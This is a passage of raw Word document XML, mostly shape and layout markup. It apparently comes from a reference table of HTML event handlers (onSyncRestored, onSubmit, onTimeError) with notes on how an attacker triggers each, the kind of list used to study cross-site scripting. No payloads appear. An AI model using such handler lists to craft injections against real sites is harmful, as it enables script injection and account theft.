                              <a:gd name="T9" fmla="*/ T8 w 1410"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1410"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1410"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1410"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1410"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3319 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1410"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3340 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1410"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3340 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1410"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3322 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1410"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3319 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1410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10" h="183">
                                <a:moveTo>
                                  <a:pt x="138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89" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="138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Text Box 84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141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onSyncRestored()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5" o:spid="_x0000_s1587" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:70.5pt;height:9.15pt;z-index:-17591296;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="141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">
                <v:shape id="Freeform 847" o:spid="_x0000_s1588" style="position:absolute;left:1930;top:154;width:1410;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="141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fKR8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE70L/Q3iF3jRbqSJboxTBtlAoum4P3l43&#10;r7vBzcuSRF3/vSkIHoeZ+YaZL3vbihP5YBwreB5lIIgrpw3XCsrdejgDESKyxtYxKbhQgOXiYTDH&#10;XLszb+lUxFokCIccFTQxdrmUoWrIYhi5jjh5f85bjEn6WmqP5wS3rRxn2VRaNJwWGuxo1VB1KI5W&#10;QfZVH8a/798/1X5/2RzLjfkovFHq6bF/ewURqY/38K39qRXMXibwfyYd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fKR8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1389,182l21,182r-3,l,161r,-3l,21,21,,1389,r21,21l1410,161r-18,21l1389,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1389,336;21,336;18,336;0,315;0,312;0,175;21,154;1389,154;1410,175;1410,315;1392,336;1389,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 846" o:spid="_x0000_s1589" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:141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6DbsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3urGIkGjq4hUEAqlMR48PrPP&#10;ZDH7NmZXTf99t1DwOMzMN8xi1dtG3KnzxrGC8SgBQVw6bbhScCi2b1MQPiBrbByTgh/ysFoOXhaY&#10;affgnO77UIkIYZ+hgjqENpPSlzVZ9CPXEkfv7DqLIcqukrrDR4TbRr4nSSotGo4LNba0qam87G9W&#10;wfrI+Ye5fp2+83NuimKW8Gd6Uep12K/nIAL14Rn+b++0gukk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7oNu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onSyncRestored()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5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>interrupts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>element's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>media</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>defined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fire)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1420"/>
          <w:tab w:val="left" w:pos="1421"/>
        </w:tabs>
        <w:spacing w:before="72"/>
        <w:ind w:left="1420" w:hanging="1231"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr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48572876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49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="841" name="Group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78"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="842" name="Freeform 844"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="78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260 78"/>
                              <a:gd name="T3" fmla="*/ 260 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 260 78"/>
                              <a:gd name="T7" fmla="*/ 260 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 260 78"/>
                              <a:gd name="T11" fmla="*/ 260 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 239 78"/>
                              <a:gd name="T15" fmla="*/ 239 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 236 78"/>
                              <a:gd name="T19" fmla="*/ 236 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 99 78"/>
                              <a:gd name="T23" fmla="*/ 99 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 78 78"/>
                              <a:gd name="T27" fmla="*/ 78 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 78 78"/>
                              <a:gd name="T31" fmla="*/ 78 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 99 78"/>
                              <a:gd name="T35" fmla="*/ 99 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 239 78"/>
                              <a:gd name="T39" fmla="*/ 239 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 260 78"/>
                              <a:gd name="T43" fmla="*/ 260 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 260 78"/>
                              <a:gd name="T47" fmla="*/ 26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Text Box 84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78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onSubmit()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2" o:spid="_x0000_s1590" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:3.9pt;width:45.6pt;height:9.15pt;z-index:-17587712;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,78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">
                <v:shape id="Freeform 844" o:spid="_x0000_s1591" style="position:absolute;left:1930;top:78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eh98QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE34X+w3ILfdNNQ1Ebs5FStCoIpdoPuGSv&#10;2dDs3SS71fTvu4Lg4zAzZ5h8OdhGnKn3tWMFz5MEBHHpdM2Vgu/jejwH4QOyxsYxKfgjD8viYZRj&#10;pt2Fv+h8CJWIEPYZKjAhtJmUvjRk0U9cSxy9k+sthij7SuoeLxFuG5kmyVRarDkuGGzp3VD5c/i1&#10;CrqPz5p4s0q7zrvZsdwbs3sdlHp6HN4WIAIN4R6+tbdawfwlheuZeARk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noffEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,182,,161r,-3l,21,21,,890,r22,21l912,161r-18,21l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,260;21,260;18,260;0,239;0,236;0,99;21,78;890,78;912,99;912,239;894,260;890,260" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 843" o:spid="_x0000_s1592" type="#_x0000_t202" style="position:absolute;left:1930;top:78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kg9sUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WjLaLRVURaEARpjAePz+wz&#10;Wcy+TbOrpv/eLRR6HGbmG2ax6mwt7tR641jBaJiAIC6cNlwqOOafr1MQPiBrrB2Tgh/ysFr2XhaY&#10;avfgjO6HUIoIYZ+igiqEJpXSFxVZ9EPXEEfv4lqLIcq2lLrFR4TbWo6TZCItGo4LFTa0qai4Hm5W&#10;wfrE2Yf53p+/sktm8nyW8G5yVWrQ79ZzEIG68B/+a2+1gun7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mSD2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onSubmit()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(requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>submits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>form)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1673" w:hanging="1569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2928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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="838" name="Group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6205"/>
                          <a:chOff x="1930" y="167"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="839" name="Freeform 841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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 349 167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 84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11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onTimeError()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9" o:spid="_x0000_s1593" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:58.35pt;height:9.15pt;z-index:-17587200;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167" coordsize="116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">
                <v:shape id="Freeform 841" o:spid="_x0000_s1594" style="position:absolute;left:1930;top:167;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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hW8cQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wf7D+EO9jJmOifDVaNMYVAQH3T+gEtz&#10;bYvNTUnSNv77RRB8PJxzvsNZrqNpxUDON5YVfEwyEMSl1Q1XCk5/v+9zED4ga2wtk4IreVivnp+W&#10;mGs78oGGY6hEgrDPUUEdQpdL6cuaDPqJ7YiTd7bOYEjSVVI7HBPctHKaZV/SYMNpocaOtjWVl2Nv&#10;FOy3m1jgbnQ+FkM/699OB3m9KPX6En8WIALF8Ajf24VWMP/8htuZd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oVvHEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,349;21,349;18,349;0,328;0,325;0,188;21,167;1146,167;1167,188;1167,328;1149,349;1146,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 840" o:spid="_x0000_s1595" type="#_x0000_t202" style="position:absolute;left:1930;top:167;width:116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u+gc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E3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LvoHBAAAA3A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onTimeError()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4"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>property,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>dur,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>value)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:ind w:left="1842" w:hanging="1738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2979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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="835" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="836" name="Freeform 838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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
